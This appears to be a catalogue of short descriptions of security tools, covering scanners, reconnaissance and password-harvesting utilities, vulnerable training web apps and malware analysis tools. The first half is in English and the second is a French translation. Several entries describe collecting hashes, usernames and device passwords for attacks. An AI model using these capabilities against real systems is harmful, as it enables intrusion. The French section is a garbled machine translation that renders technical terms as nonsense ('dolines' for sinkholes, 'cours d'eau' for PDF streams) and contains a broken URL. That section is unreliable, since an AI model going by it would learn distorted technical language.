The fuzzer used by the BFF is Sam Hocevar’s zzuf application. It was chosen for its deterministic behavior, number of features, and lightweight size.


Crunch is a wordlist generator where you can specify a standard character set or a character set you specify. crunch can generate all possible combinations and permutations.


* crunch generates wordlists in both combination and permutation ways
* it can breakup output by number of lines or file size
* now has resume support
* pattern now supports number and symbols
* pattern now supports upper and lower case characters separately
* adds a status report when generating multiple files


First what Fierce is not. Fierce is not an IP scanner, it is not a DDoS tool, it is not designed to scan the whole internet or perform any un-targeted attacks. It is meant specifically to locate likely targets both inside and outside a corporate network. Only those targets are listed (unless the -nopattern switch is used). No exploitation is performed (unless you do something intentionally malicious with the -connect switch). Fierce is a reconnaissance tool. Fierce is a Perl script that quickly scans domains (usually in just a few minutes, assuming no network lag) using several tactics.


HashGrab2 automatically mounts any Windows drives it can find, and using samdump2 extracts username-password hashes from SAM and SYSTEM files located on the Windows drive, after which it writes them to user specified directory.


Jarlsberg is a collection of codes, that shows how web application vulnerabilities can be exploited and how to defend against these attacks. It can teach you how to attack an application using common web security vulnerabilities, like cross-site scripting vulnerabilities (XSS) and cross-site request forgery (XSRF). It can also teach you how to find, fix, and avoid these common vulnerabilities and other bugs that have a security impact, such as denial-of-service, information disclosure, SQL injection, browser phishing or remote code execution. In other words, it first teaches you how hacking works and then it lets you attack itself with those attacks! This is how hands on learning should be!

Google likes to describe Jarlsberg as a cheesy web application that was intentionally built with a number of vulnerabilities. The only pre-requisite is that you should have a general understanding as to how a web application works and some knowledge about HTML, templates, cookies, AJAX, Python (since it is written in Python), etc. You play the role of a hacker in this test. It gives you a brief description about a vulnerability and then you have the task of exploiting this vulnerability! Simple as that! You are allowed to use your favourite tools such as Burp Proxy, Fiddler, Watcher, etc in your endeavors.


Metagoofil is an information gathering tool designed for extracting metadata of public documents (pdf,doc,xls,ppt,odp,ods) availables in the target/victim websites.

It will generate a html page with the results of the metadata extracted, plus a list of potential usernames very useful for preparing a bruteforce attack on open services like ftp, pop3,web applications, vpn, etc. Also it will extract a list of disclosed PATHs in the metadata, with this information you can guess OS, network names, Shared resources, etc.

This new version extracts MAC address from Microsoft Office documents. Now you can have an idea of what kind of hardware they are using.

All this information should not be available on the net, but most of the companies doesn’t have policies about information leaking… and most of them don’t know this information exists. So you can show them what information an attacker can obtain, with this simple technique.


RSMangler will take a wordlist and perform various manipulations on it similar to those done by John the Ripper with a few extras.
The main new feature is permutations mode which takes each word in the list and combines it with the others to produce all possible permutations (not combinations, order matters). For example the words freds, fresh, fish will produce the following list:


Each of these new words is then subject to the other mangles, because of this we strongly recommend with permutations mode enabled (default) you use a very small wordlist, 3 start words create a final list containing 4245 words and 5 start words creates a list containing 91975. As a test we tried it with a few hundred words and gave up when the output file got to 3G.


VIDigger is a tool designed to help VMware Virtual Infrastructure administrators harden their environment. Though the core technology of VMware is designed to be secure, there are many configuration settings and deployment considerations that can severely impact the overall security of the deployed Virtual Infrastructure. VIDigger is designed to help administrators check the configuration of ESX server and the virtual machines hosted on ESX server against the VMware Infrastructure Hardening guide and other best practices.

VIDigger will retrieve configuration data about the host and virtual machines and then deliver a customizable report of problematic areas to the Virtual Administrator. VIDigger is intended to be used throughout the deployment lifecycle both as a hardening tool and a change tracking tool that brings configuration settings changes to the attention of the administrator. The tool focused on changes that may impact the overall security of the ESX host or virtual machine(s) deployed on the ESX host.

One of the most exciting features of VIDigger is that it can be extended to add new checks as new components are added to the virtual infrastructure not currently scanned by the tool.


Vicnum is a flexible and vulnerable web application which demonstrates common web security problems such as cross site scripting, sql injections, and session management issues. The program is especially useful to IT auditors honing web security skills and setting up ‘capture the flag’ type exercises.

Being a small web application with no complex framework involved, Vicnum can easily be invoked and tailored to meet a specific need. For example if a test vulnerable application is needed in evaluating a web security scanner or a web application firewall, you might want to control a target web application to see what the scanner can find and what the firewall can protect.

Ultimately the major goal of this project is to strengthen security of web applications by educating different groups (students, management, users, developers, auditors) as to what might go wrong in a web app. And of course it’s OK to have a little fun.


The Security Auditor’s Research Assistant (SARA) is a third generation network security analysis tool that that has been available and actively updated for over 10 years. Sadly, all good things have to come to an end and so it goes for SARA. SARA 7.9.1 is our last release. Actually, SARA-7.9.2a is the final release.


1. Operates under Unix, Linux, MAC OS/X or Windows (through coLinux) OS’.
2. Integrates the National Vulnerability Database (NVD).
3. Performs SQL injection tests.
4. Performs exhaustive XSS tests
5. Can adapt to many firewalled environments.
6. Support remote self scan and API facilities.
7. Used for CIS benchmark initiatives
8. Plug-in facility for third party apps
9. CVE standards support
10. Enterprise search module
11. Standalone or daemon mode
12. Free-use open SATAN oriented license


The goal of Xplico is extract from an internet traffic capture the applications data contained.
For example, from a pcap file Xplico extracts each email (POP, IMAP, and SMTP protocols), all HTTP contents, each VoIP call (SIP), FTP, TFTP, and so on. Xplico isn’t a network protocol analyzer. Xplico is an open source Network Forensic Analysis Tool (NFAT).



CHScanner is an ARP, IPv4 and IPv6 network scanner with 31 scan methods: it scans for open ports, protocols, NetBIOS informations and Windows shares, SNMP information, and WMI (WBEM) information. It also have the ability to turn on (using Wake-On-LAN) and to shutdown or reboot a remote Windows host. Features an automatic (scriptable) working mode, a hunt mode, a passive mode and the normal scanning mode.

Some details

The main differences between CHScanner and other similar tools are:

* CHScanner use an Operating System Mimic Technology;
* CHScanner has a lot more scanning methods compared with many other scanners, starting from the Layer 2 of the OSI model. It does not only scans IPv4 addresses, it also uses ARP, IGMP, IPv6 and some higher level protocols like NetBIOS, SNMP and WMI;
* It is very flexible, scanning being done based on user defined configuration files, and quite fast;
* Besides the skinnable graphical interface, CHScanner can be used from command line to automate the scans.

Scanning modes

* Normal mode: this is the common mode used by most of the scanners today;
* Passive mode: in this mode NO packet is sent, CHScanner only listen to the network traffic and decodes the packets received, similar to a sniffer;
* Hunt mode: introduced with version, in this mode CHScanner will scan any host that tries to communicate with the host machine. The scan is triggered by received one of the following packets destined to the local machine: ARP Request, ICMP ECHO Request, TCP SYN.

By using geolocation data provided by MaxMind you can find the country associated with a specific IPv4 Address;

* Automatic, scriptable, mode: if instructed so, by command line parameters, CHScanner will do his job based on the configuration file supplied as one of the parameters, save the result and close.

Operating System Mimic Technology short description

Basically, this means that the packets it sends emulates the behavior of various operating systems and/or their native tools (where is the case). Currently it emulates the following :

* Windows XP Professional SP2
* Windows 2003 Server
* Linux kernel 2.4 (Adamantix based)
* Linux kernel 2.6 (Fedora Core based)
* Solaris 8
* OpenSolaris (Nevada 35)

There is also a « random » mode where the packets have the identification data random generated. The Solaris 8 emulation may not be continued and emulation for OpenSolaris (Nevada 35) may be added.


This tool acts much like a standard Ethernet network sniffer. However, unlike a traditional packet sniffer it doesn’t attempt to capture and decode all traffic but instead is geared toward discovering useful infrastructure and security-related data from the network, often from traffic not sent to or from the host system i.e. general broadcast network traffic. This data can reveal all manner of useful information, ranging from live systems on the network, hostnames, Ipv6 systems, routers and name servers, user names and passwords.

Tool requirements

CSniffer runs on Microsoft Windows systems (Windows 2000 upwards) and attempts to sniff network data in promiscuous mode. It can use one of two methods to achieve this:

– Using Windows’ built-in raw sockets API (default).
– Using the WinPcap packet driver.


Other than the aforementioned requirements of running under an administrator level account, there are some severe limitations when using the built-in Windows raw sockets mode.

The Microsoft raw sockets API has several restrictions that have been introduced over the years in an effort to reduce security risks associated with low level network packet access. Depending on what platform you are running on you may find that you are limited in what data can be seen on the network. A comprehensive list of all known limitations seen on different Windows operating systems and service pack levels of those operating systems has not been compiled, but here are some known issues. Again, this only applies to Windows raw sockets mode.

– Outgoing UDP and ICMP packets are not captured (OS, SP specific).
– On Windows XP Sp1, XP Sp3 and Vista no outgoing packets of any kind are captured.
– On Windows Vista with Sp1, only UDP packets are captured. TCP packets are not captured.


Flint examines firewalls, quickly computes the effect of all the configuration rules, and then spots problems so you can:

* CLEAN UP RUSTY CONFIGURATIONS that are crudded up with rules that can’t match traffic.
* ERADICATE LATENT SECURITY PROBLEMS lurking in overly-permissive rules
* SANITY CHECK CHANGES to see if new rules create problems.

Why you need Flint

You have multiple firewalls protecting internal networks from the Internet and controlling access to customer data. Your business changes, and so do your firewalls, and not always at the same time. Firewalls can get out of step with policies.

Everybody makes mistakes. To understand a firewall configuration, you have to read hundreds of configuration lines, and then you have to think like a firewall does. People aren’t good at thinking like firewalls. So most firewalls are riddled with subtle mistakes. Some of those mistakes can be expensive:

* INSECURE SERVICES might be allowed through the firewall, preventing it from blocking attacks.
* LAX CONTROLS ON DMZs may expose staging and test servers.
* FIREWALL MANAGEMENT PORTS may be exposed to untrusted networks.
* REDUNDANT FIREWALL RULES may be complicating your configuration and slowing you down.

What You Can Do With Flint

CHECK RULES BEFORE DEPLOYING THEM Flint prevents engineers from making costly mistakes. It takes just moments for Flint to evaluate a ruleset and spot errors. Your team can have it up and running in minutes. Flint is low-drag, no drama.

CLEAN UP RUSTY RULESETS Flint does the hard work of scouring firewall rules for useless crud, saving you time and allowing your team to focus on engineering problems that really matter. Flint can spot redundant and contradictory rules, and Flint makes it easier to spot business-level problems.

COMPREHEND COMPLEX CONFIGURATIONS Flint doesn’t just check firewalls for problems. It also fully understands the meanings of configuration lines, and breaks them down for you by service or by interface, so you can see at a glance what any given firewall is doing.
How to get Flint

Flint is distributed in source form. It is implemented in ruby.

Microsoft Attack Surface Analyzer

Attack Surface Analyzer is the same tool used by Microsoft’s internal product teams to catalogue changes made to the operating system by the installation of new software.

Attack Surface Analyzer takes a snapshot of your system state before and after the installation of product(s) and displays the changes to a number of key elements of the Windows attack surface.

This allows:
– Developers to view changes in the attack surface resulting from the introduction of their code on to the Windows platform
– IT Professionals to assess the aggregate Attack Surface change by the installation of an organization’s line of business applications
– IT Security Auditors evaluate the risk of a particular piece of software installed on the Windows platform during threat risk reviews
– IT Security Incident Responders to gain a better understanding of the state of a systems security during investigations (if a baseline scan was taken of the system during the deployment phase)

Microsoft Baseline Security Analyzer

The Microsoft Baseline Security Analyzer provides a streamlined method to identify missing security updates and common security misconfigurations. MBSA 2.1.1 is a minor upgrade to add support for Windows 7 and Windows Server 2008 R2.


The Nessus® vulnerability scanner is the world-leader in active scanners, featuring high-speed discovery, configuration auditing, asset profiling, sensitive data discovery and vulnerability analysis of your security posture. Nessus scanners can be distributed throughout an entire enterprise, inside DMZs and across physically separate networks.


Netbios Shares Scanner has been developed by SecPoint. The tool scans an IP address and tries to retrieve shared disks and their content. It works for Windows workstations/servers as well as for Linux boxes (smbclient used for login).


WordPress finger printer tool search and retrieve information about the plugins versions installed in WordPress systems.

It can analyze a single URL or perform an analysis based on the results indexed by Google. Additionally displays CVE code associated with each plugin, if there.


By taking advantage of poor printer security and vulnerabilities during penetration testing we are able to harvest a wealth of information from MFP devices including user-names, email addresses, user address books, authentication information including SMB, Email, LDAP passwords, etc. Sometimes, they could also aid you in remote retrieval of prints, faxes, scan copies! Certain printer installations could also allow you to access the HTTP interface, and make a configuration copy! This could allow you to further see the internals! In short, PRAEDA is designed to automate some of the information gathering from network appliances through web-management interfaces such as printers and network appliances.

This open source tool is programmed in Perl and has several modules that focus on almost 28 devices in all! The module to be used is enumerated from the different models of printers using “Title page” and “Server type” responses from the printer management page.

Its required Perl modules are:




RIPS is a static source code analyser for vulnerabilities in PHP webapplications.

RIPS automates the process of identifying potential security flaws in PHP source code by using static source code analysis.

Features of RIPS:
– detect XSS, SQLi, File disclosure, LFI/RFI, RCE vulnerabilities and more
– 5 verbosity levels for debugging your scan results
– mark vulnerable lines in source code viewer
– user-defined function code by mouse-over on detected call
– list of all user-defined functions and program entry points – (user input) connected to the source code viewer
– create CURL exploits for detected vulnerabilities with few clicks
– 7 different syntax highlighting colour schema
– only minimal requirement is a local webserver with PHP and a browser


Tool to automatically fire regular security scans with Nessus. Compare results of the current scan with the previous scan and report on the delta in a web interface. Main objective of the tool is to make repeated scans more efficient


A fully automated, active web application security reconnaissance tool. Key features:

* High speed: pure C code, highly optimized HTTP handling, minimal CPU footprint – easily achieving 2000 requests per second with responsive targets.

* Ease of use: heuristics to support a variety of quirky web frameworks and mixed-technology sites, with automatic learning capabilities, on-the-fly wordlist creation, and form autocompletion.

* Cutting-edge security logic: high quality, low false positive, differential security checks, capable of spotting a range of subtle flaws, including blind injection vectors.

The tool is believed to support Linux, FreeBSD, MacOS X, and Windows (Cygwin) environments.

SoftPerfect Network Scanner

SoftPerfect Network Scanner is a free multi-threaded IP, NetBIOS and SNMP scanner with a modern interface and many advanced features. It is intended for both system administrators and general users interested in computer security. The program pings computers, scans for listening TCP/UDP ports and displays which types of resources are shared on the network (including system and hidden).

In addition, it allows you to mount shared folders as network drives, browse them using Windows Explorer, filter the results list and more. SoftPerfect Network Scanner can also check for a user-defined port and report back if one is open. It can also resolve host names and auto-detect your local and external IP range. It supports remote shutdown and Wake-On-LAN.

Key features

* Pings computers and displays those alive.
* Detects hardware MAC-addresses, even across routers.
* Detects hidden shared folders and writable ones.
* Detects your internal and external IP addresses.
* Scans for listening TCP ports, some UDP and SNMP services.
* Retrieves currently logged-on users, configured user accounts, uptime, etc.
* You can mount and explore network resources.
* Can launch external third party applications.
* Exports results to HTML, XML, CSV and TXT
* Supports Wake-On-LAN, remote shutdown and sending network messages.
* Retrieves potentially any information via WMI.
* Retrieves information from remote registry, file system and service manager.
* It is absolutely free, requires no installation, and does not contain any adware/spyware/malware.


VASTO is a Virtualization ASsessment TOolkit, a collection of Metasploit modules meant to be used as a testing tool to perform penetration tests or security audit of virtualization solutions. It has been sponsored by Secure Network and includes contributions by fellow hackers.


WhatWeb identifies websites. It’s goal is to answer the question, “What is that Website?”. WhatWeb recognises web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices. WhatWeb has over 900 plugins, each to recognise something different. WhatWeb also identifies version numbers, email addresses, account ID’s, web framework modules, SQL errors, and more.

WhatWeb can be stealthy and fast, or thorough but slow. WhatWeb supports an aggression level to control the trade off between speed and reliability. When you visit a website in your browser, the transaction includes many hints of what web technologies are powering that website. Sometimes a single webpage visit contains enough information to identify a website but when it does not, WhatWeb can interrogate the website further. The default level of aggression, called ‘passive’, is the fastest and requires only one HTTP request of a website. This is suitable for scanning public websites. More aggressive modes were developed for in penetration tests.

Most WhatWeb plugins are thorough and recognise a range of cues from subtle to obvious. For example, most WordPress websites can be identified by the meta HTML tag, e.g. ‘‘, but a minority of WordPress websites remove this identifying tag but this does not thwart WhatWeb. The WordPress WhatWeb plugin has over 15 tests, which include checking the favicon, default installation files, login pages, and checking for “/wp-content/” within relative links.

* Over 900 plugins
* Control the trade off between speed/stealth and reliability
* Plugins include example URLs
* Performance tuning. Control how many websites to scan concurrently.
* Multiple log formats: Brief (greppable), Verbose (human readable), XML, JSON, MagicTree, RubyObject, MongoDB.
* Recursive web spidering
* Proxy support including TOR
* Custom HTTP headers
* Basic HTTP authentication
* Control over webpage redirection
* Nmap-style IP ranges
* Fuzzy matching
* Result certainty awareness
* Custom plugins defined on the command line


Halberd discovers HTTP load balancers. It is useful for web application security auditing and for load balancer configuration testing.

To cope with heavy traffic loads, web site administrators often install load balancer devices. These machines hide (possibly) many real web servers behind a virtual IP. They receive HTTP requests and redirect them to the real web servers in order to share the traffic between them.
Halberd is a tool aimed at discovering real servers behind virtual IPs.


iScanner is free open source tool lets you detect and remove malicious codes and web pages viruses from your Linux/Unix server easily and automatically.

This tool is programmed by iSecur1ty using Ruby programming language and it’s released under the terms of GNU Affero General Public License 3.0.

please note that this website is under construction. check it later for updates.

Current Features:

* Detect malicious codes in web pages. This include hidden iframe tags, javascript, vbscript, activex objects and PHP codes .
* Extensive log shows the infected files and the malicious code.
* Send email reports.
* Ability to clean the infected web pages automatically.
* Easy backup and restore system for the infected files.
* Simple and editable signature based database.
* Ability to update the database and the program easily from dedicated server.
* Very flexible options and easy to use.
* Fast scanner with good performance.
* Yes, it’s FREE!!


Nmap (« Network Mapper ») is a free and open source (license) utility for network exploration or security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are avalable for Linux, Windows, and Mac OS X.


NmapSi4 is a complete Qt4-based Gui with the design goals to provide a complete nmap interface for Users, in order to management all options of this powerful security net scanner!


ProcNetMonitor is the free tool to monitor the network activity of all running process in the system. It displays all open network ports (TCP/UDP) and active network connections for each process. It has advanced color based auto analysis system to make it easy to distinguish network oriented processes from others with just one glance at the list. Newer version also presents unique ‘Port Finder’ feature which makes it easy to search for particular port in all running process with just one click. It also comes with export feature to save the entire process-port list to standard HTML file for offline analysis.
All these features combined together make it very effective tool in combating the Trojans and Spywares installed on the system which continuously send keyboard strokes, online account data and other sensitive information to remote server.



Wepawet is a service for detecting and analyzing web-based malware. It currently handles Flash, JavaScript, and PDF files.

Traduction (anglais > français)

Catalogue des outils


Artemisa est un logiciel libre de VoIP / SIP honeypot logiciels spécifiques conçus pour se connecter à un domaine d’entreprise VoIP comme un backend user-agent afin de détecter une activité malveillante à un stade précoce. En outre, le pot de miel peut jouer un rôle dans l’ajustement en temps réel des politiques de sécurité de domaine de l’entreprise où elle est déployée.

Artemisa devrait fonctionner comme un agent utilisateur classique d’un VoIP / SIP de domaine. Pour y parvenir, il fournit des fichiers de configuration modulaire où l’administrateur peut configurer les paramètres de connexion ainsi que le comportement de l’Artemisa de.

Le serveur d’enregistrement SIP du domaine doit être également configuré pour laisser Artemisa être enregistrées avec un ensemble d’extensions (par exemple 5 extensions de 401 à 405). Une fois Artemisa est configuré et lancé, ce qui est suggéré de le faire sur une machine séparée ou à la machine virtuelle, il continue d’écouter et d’attente pour l’activité SIP. Normalement, on s’attend pas à voir l’activité SIP sur le pot de miel, comme un appel, depuis le pot de miel ne représente pas un être humain. Ainsi, tout appel ou un message qui atteignent le pot de miel est suspect et est analysée.

L’analyse implique l’utilisation de différentes techniques et outils tiers afin de déterminer et de qualifier la nature du message. Lorsque le message est classé et une conclusion est obtenue, les rapports Artemisa que de plusieurs façons, comme la course scrits configurable par l’utilisateur et l’envoi d’un rapport sur l’e-mail. Les scripts configurables par l’utilisateur permettent à l’administrateur de donner Artemisa la puissance suffisante pour ajuster les politiques de domaine en temps réel.

Coucou est une solution légère qui effectue automatisé d’analyse dynamique des binaires Windows fourni. Il est capable de retourner des rapports détaillés sur les appels clé API et de l’activité réseau.Caractéristiques actuelles sont les suivantes:

* Récupérer les fichiers à partir d’URL à distance et de les analyser.
* Trace pertinentes des appels d’API d’analyse comportementale.
* Surveiller les processus de manière récursive naissains.
* Le trafic réseau généré Dump.
* Exécuter une analyse concomitante sur plusieurs machines.
* Logiciel d’analyse de soutien personnalisé basé sur les scripts AutoIt3.
* Intercept téléchargé et les fichiers supprimés.
* Prendre des captures d’écran en cours d’exécution.

DNS Sinkhole
Un gouffre est définie comme un processus dans lequel nous rediriger réseau IP spécifique des visiteurs ciblés pour une variété de facteurs de sécurité, tout comme l’analyse, le détournement des attaques et la détection d’activités anormales. Il a prolongé été déployés par Tier-1 FAI à l’échelle mondiale couramment pour protéger leurs clients en aval. comment jamais pour les administrateurs réseau, les dolines sont couramment déployés pour offrir de précieux renseignements concernant les menaces de sécurité de leurs réseaux sont confrontés. Lisez la suite ci-dessous pour des faits supplémentaires sur dolines ainsi que le couple a de sortes de mise en œuvre des dolines – darknets et honeynets et comment vous pouvez les utiliser éventuellement pour obtenir des faits importants concernant les menaces et les erreurs de configuration de votre réseau.

DOMScan est un utilitaire pour disque IE et de capturer en temps réel DOM à partir du navigateur. Il donne accès à DOM contexte actif avec JavaScript. On peut observer les DOM en détail à l’aide de cet utilitaire. Il a des règles prédéfinies pour numériser DOM. On peut exécuter l’analyse sur les DOM existants et chercher les points d’entrée intéressante et appels. Il permet de tracer à travers des variables JavaScript. L’utilisation de ce seul utilitaire permet d’identifier les vulnérabilités suivantes.

• XSS DOM sur la base
• DOM sur la base des appels vulnérables
• Source d’abus et de méthodes de chargement de contenu externe
logique • DOM possibles et la couche d’affaires appels
• même origine des appels de contournement et de l’utilisation
• Mashup utilisation à l’intérieur DOM
• Widget examen de l’architecture en utilisant l’outil

DOMTracer – Firefox Plugin (trace les appels DOM et JavaScript)

# Les DOM comme on le voit dans tous les cas ci-dessus doit être analysé dans de nombreux aspects. l’analyse d’exécution des DOM / JavaScript est vitale et une aides d’examiner les appels effectués au cours de la «manipulation dynamique DOM. Le DOMTracer est une extension Firefox pour le même but. Il a été écrit en utilisant la méthode standard de l’écriture d’extensions en utilisant la plate-forme XUL et le langage JavaScript dans la majorité. Ceci est en version bêta et nous travaillons sur de nouvelles fonctionnalités.

DarunGrim est un outil de comparer des binaires. DarunGrim est un outil diffing libre qui offre des fonctionnalités diffing binaire.
diffing binaire est une technique puissante pour la rétro-ingénierie correctifs publiés par les éditeurs de logiciels comme Microsoft.Surtout en analysant les correctifs de sécurité vous pouvez creuser dans les détails de la vulnérabilité c’est de fixation. Vous pouvez utiliser cette information pour savoir ce qui cause la rupture de logiciels. Également que l’information peut vous aider à écrire des codes de protection pour les vulnérabilités spécifiques. Il est également utilisé pour écrire des exploits de 1 jour par les auteurs de logiciels malveillants ou des chercheurs en sécurité.

Cette technique diffing binaire est particulièrement utile pour les fichiers binaires Microsoft. Pas comme d’autres fournisseurs qu’ils ne rejettent patch régulièrement et les vulnérabilités patché sont relativement concentrés dans de petites zones dans le code. Ce qui fait la part patché plus visible et évident pour les analyseurs de patch. Il ya un « eEye Binary diffing Suites », sorti en 2006 et il est largement utilisé par les chercheurs pour identifier les vulnérabilités de sécurité. Même si il est gratuit et opensource, il est suffisamment puissant pour être utilisé à cet effet de chasse des vulnérabilités.Maintenant, je suis libérant DarunGrim2 qui est un C + + port de codes python original. DarunGrim2 est beaucoup plus rapide que l’original DarunGrim.

Faster Unpacker Universal
FUU (plus rapide universelle Unpacker) est une interface graphique Windows outil avec un ensemble d’outils (plugins) pour vous aider à décompresser, décompresser et décrypter la plupart des programmes de repas, compressés ou cryptés avec les programmes knowns très bien la protection des logiciels comme UPX, ASPack,FSG, ACProtect, etc

L’interface graphique a été conçu en utilisant RadASM et MASM.Chaque plugin inclus dans la version officielle a été écrit en utilisant ASM MASM.

Le noyau de chaque plugin SDK de l’utilisation TitanEngine ReversingLabs sous le capot, cette aide au développeur d’écrire des plugins très facile et très rapide sans avoir à se préoccuper de certaines fonctions répétitives et ennuyeuses comme dump, fixer la RAI, ajouter des sections, etc Vous pouvez développer un plugin pour FUU d’une manière très facile à utiliser TitanEngine.

En outre, FUU comprennent des outils supplémentaires comme:

* Finder OEP générique
* Détecteur Signature Cryto
* Unpacker générique
* Signatures Detector (prochaine version)


l’origami est un cadre conçu pour analyser Ruby, analyser et établir des documents PDF. Ce n’est pas une bibliothèque de rendu PDF. Il vise à fournir un outil de script pour générer et analyser un fichier PDF malicieux. En outre, il peut être utilisé pour créer sur la volée au format PDF personnalisés, ou pour injecter (mal) en code documents déjà existants.


* Créez des documents PDF à partir de zéro.
* Analyse des documents existants, les modifier et les recompiler.
* Découvrez des documents au niveau de l’objet, aller en profondeur dans la structure du document, décompression objet PDF ruisseaux et desobfuscating noms et des cordes.
* Les opérations de haut niveau, telles que le chiffrement / déchiffrement, signature, pièces jointes …
* Une interface GTK pour naviguer rapidement dans le contenu du document.

PDF Stream Dumper est un outil gratuit qui aide à l’analyse des documents PDF malicieux. Il a aussi quelques fonctionnalités qui peuvent le rendre utile pour le développement vulnérabilité PDF. Des outils spécialisés qui traitent de code JavaScript obscurcie, le faible niveau d’en-tête et le lecteur PDF objet sont disponibles. En termes d’analyse shellcode, il dispose d’une interface intégrée pour sctest libemu, une mise à jour de construire SCLOG iDefense, et une fonction shellcode_2_exe. des outils JavaScript comprennent l’intégration avec JS-Beautifier pour le formatage du code, la possibilité d’exécuter des portions du script vivre pour vivre de-faux-fuyants, ainsi qu’un moteur de refactorisation assez stable qui va analyser un script et remplacer les noms de toutes les fonctions screwy aléatoire et variable avec logique versions expurgées pour une meilleure lisibilité sont également disponibles.

Liste complète des fonctionnalités

* Filtres supportés: FlateDecode, RunLengthDecode, ASCIIHEXDecode, ASCII85Decode, LZWDecode
* Des outils intégrés shellcode:
o gui SCLOG (Shellcode outil d’analyse)
o libemu scdbg outil d’analyse basé Shellcode
o fonctionnalité Shellcode_2_Exe
o Export unescaped octets de fichier
* Prend en charge le chaînage de filtre (c.-à-plusieurs filtres appliqués à un même flux)
* Supporte unescaping têtes pdf codé
* Interface scriptable pour traiter plusieurs fichiers et générer des rapports
* Voir tous les objets pdf
* Voir dégonflé les cours d’eau
* Voir les détails flux telles que les compensations de fichiers, d’en-tête, etc
* Enregistrer les données brutes et dégonflé
* Recherche flux pour les chaînes
* Scan pour les fonctions qui contiennent des exploits pdf (dumb scan)
* Js javascript en forme en utilisant beautifier (voir les crédits dans le fichier README)
* Voir le cours d’eau comme des dumps hexa
* Zlib compresser / décompresser des fichiers arbitraires
* Remplacer / mise à jour des flux pdf avec vos propres données
* Basic interface JavaScript afin de pouvoir exécuter les parties de scripts intégrés
* PdfDecryptor w / source – iTextSharp utilise et requiert Net Framework 2.0.
* Base de JavaScript-obsfuscator
* Peut cacher: en-tête que les cours d’eau, double flux, certains flux
* JS interface utilisateur a également accès à une classe de boîte à outils
o simplifier les chaînes fragmenté
o les fichiers en lecture / écriture
o ne hexdumps
o ne décode unicode sécurité
moteur désassembleur o
o reproduire certaines communes Adobe API (nouveau)

PDF Stream Dumper soutient également unescaping / mise manipulé en-têtes de fichier PDF, tout en étant capable de décoder les chaînes de filtre (plusieurs filtres appliqués à l’objet même flux.) Via des plugins et ajoute des fonctionnalités d’automatisation via des scripts VBS différents.

scripts d’automatisation en cours:

* Csv_stats.vbs – csv builds avec les résultats de la barre de statut inférieur pour tous les fichiers dans un répertoire
* Pdfbox_extract.vbs – PDFBox utiliser pour extraire toutes les images et le texte d’un fichier actif
* String_scan.vbs – analyser tous les flux décompressé dans tous les fichiers dans un répertoire pour une chaîne que vous saisissez
* Unsupported_filters.vbs – scanner un répertoire et établir une liste de tous les fichiers PDF, qui ont des filtres non pris en charge
* Filter_chains.vbs – scanne récursivement répertoire parent pour les fichiers PDF qui utilisent des filtres d’encodage sur un flux.
* Obsfuscated_headers.vbs – scanne récursivement répertoire parent pour les fichiers PDF qui ont obsfuscated têtes objet
* Pdfbox_extract_text_page_by_page.vbs – utilise PDFBox pour extraire des données de page dans des fichiers individuels


https: / / / Evilcry / scripts Python
PyOLEScanner – malveillant de détection de fichiers Office Lire la suite … pour plus d’informations de fond

Version 1.3 contient:

1. Correction d’un bug.
2. Plus Shellcode détection.
3. Plus d’API de détection.
4. SQLite Support.
5. Macro OLE2 Scan.
6. Office2007 (docx / pptx / xlsx) vérifie dégonfler et Macro.

Répertoire scan fonctionne aussi, en présence de chiffrement un «déchiffré» exemplaire.

UTILISATION: _suspect_document python

Compatibilité avec Windows et Linux est maintenu.

Flasm désassemble votre SWF entier, y compris tous les délais et les événements. En regardant le démontage, vous apprendrez comment fonctionne le compilateur de Flash, ce qui améliore vos compétences ActionScript. Vous pouvez également faire quelques optimisations sur le code désassemblé à la main ou ajuster le code que vous le souhaitez. Flasm applique ensuite les modifications apportées à l’original SWF, en remplacement des actions originales.

Il est également possible d’intégrer des actions flasm dans votre code ActionScript, ce qui rend l’optimisation de grands projets plus à l’aise.

Flasm n’est pas un décompilateur. Qu’est-ce que vous obtenez est la représentation lisible de bytecode SWF, pas source ActionScript. Si vous êtes à la recherche d’un décompilateur, Flare peut répondre à vos besoins. Toutefois, Flare ne peut pas modifier le fichier SWF.

Son utilisation la plus courante est la génération de bibliothèques de ressources contenant des images (PNG et JPEG), les polices (TTF) ou d’autres films SWF pour une utilisation avec MTASC ou haXe compilé ActionScript, bien swfmill peut être utilisé pour produire à la fois des structures simples et complexes SWF .

* Construit autour d’un XSLT / processeur EXSLT (libxslt)
* Entrée et de sortie de la transformation XSLT peut être soit XML ou binaire SWF
* les commandes XSLT pour l’importation de PNG, JPEG, SWF et TTF, et pour la cartographie SWF numéros d’identification
* Built-in « dialecte simple » pour soutenir la création et le renforcement des fonds souverains bibliothèque simple

swfmill a été écrit par Daniel Turing, mais est maintenant mis à jour par Daniel Cassidy. Il comprend des contributions substantielles par Ralf Fuest, Steve Webster et d’autres.

Graudit est un script simple et ensembles de signature qui vous permet de trouver des failles de sécurité potentielles dans le code source en utilisant l’utilitaire grep de GNU. Il est comparable à d’autres applications d’analyse statique comme des rats, et vice-SWAAT viseur.

Version 1.8

*-L ‘opérateur ne vim numéros de ligne convivial
Man pages * et mises à jour de documentation
* Mises à jour la signature PHP
* Mises à jour la signature JSP
* Mises à jour la signature Dotnet
* Mises à jour la signature Perl et corrections de bugs
* Mises à jour la signature Python
Bug * aux correctifs pour / scripts
Plus * aux / scripts
* Correction d’ignorer les répertoires CVS par défaut

IEZoneAnalyzer est un utilitaire pour visualiser et comparer les paramètres d’Internet Explorer zone de sécurité. Il est particulièrement utile sur les systèmes contrôlés par la stratégie de groupe, à laquelle la norme de sécurité boîte de dialogue des paramètres ne permet pas l’affichage des paramètres.IEZoneAnalyzer version 3 représente une réécriture totale, l’ajout d’une quantité considérable de nouvelles fonctionnalités par rapport aux versions antérieures. Notez que IEZoneAnalyzer ne nécessite pas de droits d’administration. Il n’a pas non plus un programme d’installation – il suffit d’exécuter l’utilitaire directement.IEZoneAnalyzer ne require.NET Framework 3.5.

Les principales caractéristiques de IEZoneAnalyzer:

